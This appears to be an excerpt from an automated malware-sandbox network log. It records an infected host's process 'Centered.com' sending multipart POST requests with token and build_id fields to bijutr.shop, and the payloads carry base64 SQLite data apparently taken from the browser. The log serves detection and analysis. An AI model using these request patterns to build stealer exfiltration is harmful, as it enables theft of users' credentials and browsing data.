                                                                                                                                                                                                                                                                                      2024-12-27 06:10:33 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                      Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:34 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:34 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:34 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      28192.168.2.749879188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----EKNG4EUSR1N7YUA16890
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 262605
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 4b 4e 47 34 45 55 53 52 31 4e 37 59 55 41 31 36 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 45 4b 4e 47 34 45 55 53 52 31 4e 37 59 55 41 31 36 38 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 45 4b 4e 47 34 45 55 53 52 31 4e 37 59 55 41 31 36 38 39 30 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------EKNG4EUSR1N7YUA16890Content-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------EKNG4EUSR1N7YUA16890Content-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------EKNG4EUSR1N7YUA16890Cont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                      Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:35 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:37 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:37 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      29192.168.2.749884188.245.216.2054437244C:\Users\user\AppData\Local\Temp\322891\Centered.com
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC326OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----26FKFK6PZ58QIECJWLFK
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 393697
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 46 4b 46 4b 36 50 5a 35 38 51 49 45 43 4a 57 4c 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 38 30 39 30 63 31 31 30 36 39 33 31 66 64 30 62 64 30 32 63 33 35 32 63 30 33 36 39 32 62 33 0d 0a 2d 2d 2d 2d 2d 2d 32 36 46 4b 46 4b 36 50 5a 35 38 51 49 45 43 4a 57 4c 46 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 65 39 62 33 38 30 36 63 66 32 39 61 35 36 35 38 63 30 61 61 64 33 31 64 62 62 63 38 65 37 64 0d 0a 2d 2d 2d 2d 2d 2d 32 36 46 4b 46 4b 36 50 5a 35 38 51 49 45 43 4a 57 4c 46 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                      Data Ascii: ------26FKFK6PZ58QIECJWLFKContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------26FKFK6PZ58QIECJWLFKContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------26FKFK6PZ58QIECJWLFKCont
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                      2024-12-27 06:10:36 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
